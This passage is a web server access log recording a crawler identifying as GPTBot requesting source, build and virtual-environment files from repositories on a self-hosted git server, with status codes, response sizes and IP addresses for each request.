git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/metadata.json" +[17/Feb/2026:17:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10938] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:17:02:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14319] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14312] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11047] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14313] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/01698e701c846122840ffbef6cfc9a5bdb7524ea/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14313] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7e17878d5a18ed5af03348de1b2ba6cacf19602e/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10937] [Gzip 3.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:17:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11044] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/GoldMonitor/localpycs/struct.pyc" +[17/Feb/2026:17:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14312] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11045] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0700910c4bfa829ff77b4adb54eb820a12f51e8c/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14313] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/aeec38c08f4b3b16e26a997a70d46a8d04e5896d/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc?display=rendered" [Client 74.7.227.38] [Length 10906] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/GoldPilot/build/AssetPilot/localpycs/struct.pyc" +[17/Feb/2026:17:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2?display=rendered" [Client 74.7.227.38] [Length 11049] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/7d610436bd3bfb5efa4425e1f9e66a8cc897189d/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2?display=source" [Client 74.7.227.38] [Length 14314] [Gzip 4.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9a604cd56b83970def6bcd1b8d3b4de39430b5f6/C++Project/TestProject/build/CMakeFiles/Makefile2" +[17/Feb/2026:17:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11663] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:02:26 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11688] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:02:27 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11689] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11690] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:02:28 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt?display=source" [Client 74.7.227.38] [Length 11691] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/3e4db647c22a7292965a613e62ce815b9da823a8/C++Project/TestProject/CMakeLists.txt" +[17/Feb/2026:17:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest?display=rendered" [Client 74.7.227.38] [Length 11654] [Gzip 3.10] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/PythonTest" +[17/Feb/2026:17:02:29 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12669] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker" +[17/Feb/2026:17:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate?display=source" [Client 74.7.227.38] [Length 13013] [Gzip 3.82] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/activate" +[17/Feb/2026:17:02:30 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python?display=source" [Client 74.7.227.38] [Length 11078] [Gzip 2.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:17:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python?display=rendered" [Client 74.7.227.38] [Length 11024] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/python" +[17/Feb/2026:17:02:31 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv?display=source" [Client 74.7.227.38] [Length 11557] [Gzip 3.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/dotenv" +[17/Feb/2026:17:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js?display=source" [Client 74.7.227.38] [Length 27387] [Gzip 7.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/static/js/app.js" +[17/Feb/2026:17:02:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets?display=source" [Client 74.7.227.38] [Length 11557] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/websockets" +[17/Feb/2026:17:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11569] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:17:02:33 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3?display=rendered" [Client 74.7.227.38] [Length 11025] [Gzip 3.01] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/fc1462a3f3e004bb33b52808fd01df2dfdbf79d3/asset_pilot_docker/.venv/bin/pip3" +[17/Feb/2026:17:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer?display=source" [Client 74.7.227.38] [Length 11574] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/normalizer" +[17/Feb/2026:17:02:34 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn?display=source" [Client 74.7.227.38] [Length 11545] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/uvicorn" +[17/Feb/2026:17:02:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_edit/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:35 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_edit/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:35 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/_delete/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4851] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/_delete/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:36 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/branch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 9823] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/blame/branch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 12130] [Gzip 4.71] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:37 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/raw/branch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 859] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/rss/branch/main/asset_pilot_docker/Dockerfile" [Client 74.7.227.38] [Length 943] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/Dockerfile" +[17/Feb/2026:17:02:38 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx?display=rendered" [Client 74.7.227.38] [Length 10976] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/httpx" +[17/Feb/2026:17:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11562] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/d4f1ca87ab7f1292db644da6b64b8d099a6c8e96/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:17:02:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles?display=source" [Client 74.7.227.38] [Length 11559] [Gzip 3.14] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/adf9a81cb0ea52c9fa32f352b5800e021665bb47/asset_pilot_docker/.venv/bin/watchfiles" +[17/Feb/2026:17:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 10912] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/90c7377285c0e63de46467557a2f081b33097f03/.Backup/html/metadata.json" +[17/Feb/2026:17:02:40 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11606] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d291f57b63b0b2be49f636657ef35169d418129/C++Project/industrial-comm/build/CMakeFiles/3.31.10" +[17/Feb/2026:17:02:41 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/9374d883a61b35708b6c621337a654b11bcdb426/C++Project/industrial-comm/build/CMakeFiles/3.31.10/CMakeSystem.cmake" [Client 74.7.227.38] [Length 11604] [Gzip 3.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 